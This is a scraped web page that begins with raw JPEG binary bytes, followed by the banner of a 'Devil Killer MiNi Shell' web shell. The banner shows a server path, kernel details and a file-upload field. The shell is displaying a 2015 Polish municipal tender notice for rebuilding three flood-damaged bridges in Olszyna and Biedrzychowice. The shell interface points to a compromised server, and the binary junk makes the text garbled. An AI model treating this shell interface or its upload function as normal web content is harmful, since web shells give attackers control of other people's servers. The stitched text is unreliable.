JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150806/200148-N-2015.html

<p class="kh_header"><b>Olszyna: CZĘŚĆ I: Odbudowa mostu w m. Biedrzychowice dz. nr 361/3, 364 [powódź lipiec 2013 r.]
CZĘŚĆ II: Odbudowa mostu w m. Olszyna dz. nr 321/2  [powódź lipiec 2012 r.]
CZĘŚĆ III: Odbudowa mostu w miejscowości: Biedrzychowice dz. nr 37/2, 373 [powódź lipiec 2013 r.]</b><br>
<b>Numer ogłoszenia: 200148 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olszyna , ul. Wolności 6, 59-830 Olszyna, woj. dolnośląskie, tel. 075 7212368, faks 075 7212050.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.olszyna.nv.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> CZĘŚĆ I: Odbudowa mostu w m. Biedrzychowice dz. nr 361/3, 364 [powódź lipiec 2013 r.]
CZĘŚĆ II: Odbudowa mostu w m. Olszyna dz. nr 321/2  [powódź lipiec 2012 r.]
CZĘŚĆ III: Odbudowa mostu w miejscowości: Biedrzychowice dz. nr 37/2, 373 [powódź lipiec 2013 r.].</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 CZĘŚĆ I: 
Odbudowa mostu w m. Biedrzychowice dz. nr 361/3, 364 [powódź lipiec 2013 r.]
Zaprojektowano obiekt mostowy z blachy falistej (np. typu ViaCon SUPERCOR SC-2B) z pionowym ścięciem wlotów o następujących parametrach:
- szerokości - 3550mm
- wysokości w kluczu - 1420mm
- światło - 4,33m2
- kąt pomiędzy osią obiektu a ścianką czołową obiektu na wlocie - 73,80°
- kąt pomiędzy osią obiektu a ścianką czołową obiektu na wylocie - 70,54°
- długość obiektu mierzona dołem wzdłuż osi podłużnej obiektu - 8077mm
- rzędna dna na wlocie obiektu - 307,55m n.p.m
- rzędna dna na wylocie obiektu - 307,45m n.p.m
- konstrukcja składa się z blachy falistej o grubości 7mm łączonych na śruby, przepust wykonany będzie ze stali powlekanej warstwami ochronnymi (ocynkowanie)
- konstrukcja zabezpieczona antykorozyjnie farbą epoksydową na całej wewnętrznej powierzchni
- konstrukcję przepustu posadowić na ławie fundamentowej żelbetowej o wymiarach 100x100cm z betonu B30 zbrojonej stalą 18G2
- ścianki czołowe oraz mury oporowe wykonane z kamienia 120/300 na zaprawie cementowej M20
Kubatura betonu do wykonania ław fundamentowych - 46,80 m3
Ciężar stali zbrojeniowej do zbrojenia fundamentów - 1476,44 kg
Aby dodatkowo zabezpieczyć konstrukcję obiektu na działanie wody należy wykonać ławy ochronne z betonu B30 o wymiarach 30x50cm posadowione na ławie fundamentowej od strony koryta cieku.
Kubatura betonu do wykonania ław ochronnych - 2,42 m3
W celu wzmocnienia i usztywnienia obiektu na krańcach należy wykonać wieńce żelbetowe z betonu B30 i zbrojone stalą 18G2.
Kubatura betonu do wykonania wieńców - 3,50 m3
Ciężar stali zbrojeniowej do zbrojenia wieńców - 168,32 kg
Zaprojektowano wykonanie ścianek czołowych oraz murów oporowych z kamienia 120/300 na zaprawie cementowej M20.
Kubatura ścianek czołowych i murów oporowych z kamienia - 24,00 m3
W celu zamontowania bariero-poręczy BPS w obrębie projektowanego obiektu mostowego należy na ściankach czołowych obiektu, równolegle do krawędzi jezdni posadowić ławy żelbetowe z betonu B30 zbrojoną stalą 18G2.
Kubatura betonu do wykonania ław żelbetowych - 4,78 m3
Ciężar stali zbrojeniowej do zbrojenia ław żelbetowych - 768,62 kg
Zasypkę obiektu wykonać z kruszywa ziarnistego o frakcjach 0-45mm, o wskaźniku różnoziarnistości Cu>5,0, wskaźniku krzywizny 1<Cc<3 i wodoprzepuszczalności k>6m/dobę (żwir, mieszanki żwirowo-piaskowe, pospółkę) nie zawierającego związków organicznych                i zmarzlin. Materiał zasypki układać symetrycznie po obu stronach obiektu o grubości warstw 30cm. Wskaźnik zagęszczenia zasypki wg. próby Proctora powinien wynosić 0,98,            a w bezpośrednim sąsiedztwie konstrukcji obiekty dopuszcza się 0,95.
Kubatura zasypki - 72,00 m3
Na wysokości 10cm od góry projektowanego przepustu należy ułożyć warstwę geowłókniny o gramaturze 250-300g/ m2
Powierzchnia geowłókniny do ułożenia - 25,00 m2
W celu zapewnienia prawidłowego odwodnienia konstrukcji należy w ściankach czołowych              i murach oporowych wyprowadzić sączki drenarskie w rozstawie co 2,00m.
Ustawienie konstrukcji przepustu, wykonanie ścianek czołowych oraz zasypki wykonać zgodnie ze Specyfikacją Techniczną - D-03.01.02 oraz D-03.01.01
Mury oporowe wykonać zgodnie ze Specyfikacją Techniczną - D-10.01.01
Beton konstrukcyjny wykonać zgodnie ze Specyfikacją Techniczną - M-13.01.00
Zbrojenia wykonać zgodnie ze Specyfikacją Techniczną - M-12.01.00
Po wykonaniu obiektu mostowego należy ułożyć nową konstrukcję jezdni na obiekcie oraz za i przed obiektem z nawiązaniem się do istniejącej niwelety drogi.
Długość odcinka drogi do odtworzenia - 30,00mb

2.2 
CZĘŚĆ II: Odbudowa mostu w m. Olszyna dz. nr 321/2  [powódź lipiec 2012 r.]
Zaprojektowano obiekt mostowy z blachy falistej (np. typu ViaCon SUPERCOR SC-39B)                  z pionowym ścięciem wlotów o następujących parametrach:
- szerokości - 9145mm
- wysokości w kluczu - 1940mm
- światło - 14,64m2
- kąt pomiędzy osią obiektu a ścianką czołową obiektu na wlocie - 90°
- kąt pomiędzy osią obiektu a ścianką czołową obiektu na wylocie - 90°
- długość obiektu mierzona dołem wzdłuż osi podłużnej obiektu - 6934mm
- rzędna dna na wlocie obiektu - 231,28m n.p.m
- rzędna dna na wylocie obiektu - 231,20m n.p.m
- konstrukcja składa się z blachy falistej o grubości 7mm łączonych na śruby, przepust wykonany będzie ze stali powlekanej warstwami ochronnymi (ocynkowanie)
- konstrukcja zabezpieczona antykorozyjnie farbą epoksydową na całej wewnętrznej powierzchni.
- konstrukcję przepustu posadowić na ławie fundamentowej żelbetowej o wymiarach 100x100cm z betonu B30 zbrojonej stalą 18G2.
- ścianki czołowe oraz mury oporowe wykonane z kamienia 120/300 na betonie B20.
Kubatura betonu do wykonania ław fundamentowych - 34,50 m3
Ciężar stali zbrojeniowej do zbrojenia fundamentów - 1018,09 kg
Aby dodatkowo zabezpieczyć konstrukcję obiektu na działanie wody należy wykonać ławy ochronne z betonu B30 o wymiarach 30x50cm posadowione na ławie fundamentowej od strony koryta cieku
Kubatura betonu do wykonania ław ochronnych - 1,94 m3
W celu wzmocnienia i usztywnienia obiektu na krańcach należy wykonać wieńce
żelbetowe z betonu B30 i zbrojone stalą 18G2
Kubatura betonu do wykonania wieńców - 6,20 m3
Ciężar stali zbrojeniowej do zbrojenia wieńców - 336,74 kg
Zaprojektowano wykonanie ścianek czołowych oraz murów oporowych z kamienia
120/300 na zaprawie cementowej M20.
Kubatura ścianek czołowych i murów oporowych z kamienia - 30,00 m3
W celu zamontowania bariero-poręczy BPS w obrębie projektowanego obiektu
mostowego należy na ściankach czołowych obiektu, równolegle do krawędzi jezdni
posadowić ławy żelbetowe z betonu B30 zbrojoną stalą 18G2.
Kubatura betonu do wykonania ław żelbetowych - 7,10 m3
Ciężar stali zbrojeniowej do zbrojenia ław żelbetowych - 1001,25 kg
Zasypkę obiektu wykonać z kruszywa ziarnistego o frakcjach 0-45mm, o wskaźniku różnoziarnistości Cu>5,0, wskaźniku krzywizny 1<Cc<3 i wodoprzepuszczalności k>6m/dobę (żwir, mieszanki żwirowo-piaskowe, pospółkę) nie zawierającego związków organicznych            i zmarzlin. Materiał zasypki układać symetrycznie po obu stronach obiektu o grubości warstw 30cm. Wskaźnik zagęszczenia zasypki wg. próby Proctora powinien wynosić 0,98,           a w bezpośrednim sąsiedztwie konstrukcji obiekty dopuszcza się 0,95.
Kubatura zasypki - 80,00 m3
Na wysokości 10cm od góry projektowanego przepustu należy ułożyć warstwę geowłókniny o gramaturze 250-300g/ m2
Powierzchnia geowłókniny do ułożenia - 60,00 m2
W celu zapewnienia prawidłowego odwodnienia konstrukcji należy w ściankach czołowych              i murach oporowych wyprowadzić sączki drenarskie w rozstawie co 2,00m.
Ustawienie konstrukcji przepustu, wykonanie ścianek czołowych oraz zasypki wykonać zgodnie ze Specyfikacją Techniczną - D-03.01.02 oraz D-03.01.01
Mury oporowe wykonać zgodnie ze Specyfikacją Techniczną - D-10.01.01
Beton konstrukcyjny wykonać zgodnie ze Specyfikacją Techniczną - M-13.01.00
Zbrojenia wykonać zgodnie ze Specyfikacją Techniczną - M-12.01.00
Po wykonaniu obiektu mostowego należy ułożyć nową konstrukcję jezdni na
obiekcie oraz za i przed obiektem z nawiązaniem się do istniejącej niwelety drogi.
Długość odcinka drogi do odtworzenia - 15,50mb

2.3 
CZĘŚĆ III: Odbudowa mostu w miejscowości: Biedrzychowice dz. nr 37/2, 373 [powódź lipiec 2013 r.]
Zaprojektowano obiekt mostowy z blachy falistej o średnicy O1600 ze ścięciem na wlocie               w stosunku 1:1,5 i pionowym ścięciem na wylocie o następujących parametrach:
- średnica - 1600mm
- światło - 2,01m2
- kąt pomiędzy osią obiektu a ścianką czołową obiektu na wlocie - 90°
- kąt pomiędzy osią obiektu a ścianką czołową obiektu na wylocie - 30°
- długość obiektu mierzona dołem wzdłuż osi podłużnej obiektu - 18000mm
- rzędna dna na wlocie obiektu - 312,85m n.p.m
- rzędna dna na wylocie obiektu - 312,70m n.p.m
- konstrukcja składa się z blachy falistej o grubości 3mm łączonych na śruby, przepust wykonany będzie ze stali powlekanej warstwami ochronnymi (ocynkowanie)
- konstrukcja zabezpieczona obustronnie powłoką polimerową
- konstrukcję przepustu posadowić na ławie piaskowej grub. 0,30m i szer. 2,00m.
- ściankę czołową i mury oporowe na wylocie posadowić na ławie fundamentowej żelbetowej o wymiarach 100x100cm z betonu B30 zbrojonej stalą 18G2.
- ścianki czołowe oraz mury oporowe wykonane z kamienia 120/300 na zaprawie cementowej M20.
- wlot umocnić brukiem kamiennym 120/300 na betonie B10 grubości 20cm
Kubatura ławy pisakowej grub. 30cm pod konstrukcją przepustu - 11,00 m3
Kubatura betonu do wykonania ław fundamentowych - 13,40 m3
Ciężar stali zbrojeniowej do zbrojenia fundamentów - 404,77 kg
Zaprojektowano wykonanie ścianek czołowych oraz murów oporowych z kamienia
120/300 na zaprawie cementowej M20.
Kubatura ścianek czołowych i murów oporowych z kamienia - 15,50 m3
Zasypkę obiektu wykonać z kruszywa ziarnistego o frakcjach 0-45mm, o wskaźniku różnoziarnistości Cu>5,0, wskaźniku krzywizny 1<Cc<3 i wodoprzepuszczalności k>6m/dobę (żwir, mieszanki żwirowo-piaskowe, pospółkę) nie zawierającego związków organicznych i zmarzlin. Materiał zasypki układać symetrycznie po obu stronach obiektu o grubości warstw 30cm. Wskaźnik zagęszczenia zasypki wg. próby Proctora powinien wynosić 0,98, a w bezpośrednim sąsiedztwie konstrukcji obiekty dopuszcza się 0,95.
Kubatura zasypki - 135,00 m3
Na wysokości 10cm od góry projektowanego przepustu należy ułożyć warstwę geowłókniny o gramaturze 250-300g/ m2
Powierzchnia geowłókniny do ułożenia - 90,00 m2
W celu zapewnienia prawidłowego odwodnienia konstrukcji należy w ściankach czołowych                          i murach oporowych wyprowadzić sączki drenarskie w rozstawie co 2,00m.
Ustawienie konstrukcji przepustu, wykonanie ścianek czołowych oraz zasypki wykonać zgodnie ze Specyfikacją Techniczną - D-03.01.02 oraz D-03.01.01
Mury oporowe wykonać zgodnie ze Specyfikacją Techniczną - D-10.01.01
Beton konstrukcyjny wykonać zgodnie ze Specyfikacją Techniczną - M-13.01.00
Zbrojenia wykonać zgodnie ze Specyfikacją Techniczną - M-12.01.00
Po wykonaniu obiektu mostowego należy ułożyć nową konstrukcję jezdni na obiekcie oraz za i przed obiektem z nawiązaniem się do istniejącej niwelety drogi.
Długość odcinka drogi do odtworzenia - 15,50mb
Szczegółowy zakres robót związany z realizacją przedmiotowego zadania zawarty jest             w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót  stanowiącej integralną część SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.11.12.00-0, 45.20.00.00-9, 45.22.00.00-5, 45.22.11.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości:

CZĘŚĆ I - 5500,00zł. (słownie złotych: pięć tysięcy pięćset  złotych)
CZĘŚĆ II -   9500,00 zł. (słownie złotych: dziewięć tysięcy pięćset  złotych).
CZĘŚĆ III - 4500,00 zł. (słownie złotych: cztery tysiące pięćset  złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	oświadczenie o spełnieniu warunków udziału w postępowaniu, sporządzone przez Wykonawcę samodzielnie lub z wykorzystaniem ZAŁĄCZNIKA NR 1 DO SIWZ
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia określony warunek.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem zawodowym legitymując się wykonaniem             w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków                         o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - trzech robót w zakresie budowy, przebudowy, rozbudowy mostu, wiaduktu -  w  tym każde zadanie o wartości nie mniejszej niż  200 000 zł. brutto. Wykonawca zobowiązany jest podać rodzaj i wartość,  daty  i miejsca wykonania oraz załączyć dowody dotyczące najważniejszych robót, określających, czy roboty  te zostały wykonane w sposób należyty oraz wskazujący, czy zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone. 
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	wykaz robót budowlanych - sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem ZAŁĄCZNIKA NR 3 DO SIWZ 
b)	dowodami są: poświadczenia (np.: referencje, listy polecające). Jeżeli 
z uzasadnionych przyczyn o obiektywnym  charakterze wykonawca nie jest 
w stanie uzyskać poświadczenia winien złożyć inne dokumenty (opinie inspektora nadzoru, protokół odbioru robót, itp.). W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia określony warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	oświadczenie o spełnieniu warunków udziału w postępowaniu, sporządzone przez Wykonawcę samodzielnie lub z wykorzystaniem ZAŁĄCZNIKA NR 1 DO SIWZ
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia określony warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli przedstawi wykaz osób, które będą uczestniczyć w wykonaniu zamówienia w zakresie kierowania robotami budowlanymi wraz z oświadczeniem, że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  - ZAŁĄCZNIKA NR 6 DO SIWZ.
Osoba wskazana na stanowisko kierownika budowy - musi  posiadać uprawnienia  budowlane bez ograniczeń w specjalności mostowej.

Osoba ta winna posiadać odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane                                        (t. j. : Dz. U.  z 2010r., Nr 243, poz. 1623 ze zm.) oraz z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie wcześniej obowiązujących przepisów oraz przynależeć do właściwej izby samorządu zawodowego.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia określony warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku zamawiający żąda przedłożenie przez wykonawcę następujących dokumentów:
a)	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia -  na kwotę nie mniejszą niż                               300 000 PLN (trzysta tysięcy złotych).  Jeżeli z treści polisy nie wynika fakt jej opłacenia do oferty należy dołączyć dokument potwierdzający opłacenie polisy.
Jeżeli Wykonawca składa ofertę na kilka części to kwotę 300 000 zł. należy przemnożyć razy ilość części.

b)	informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie niższą niż 300 000 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli Wykonawca składa ofertę na kilka części to kwotę 300 000 zł. należy przemnożyć razy ilość części.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia określony warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

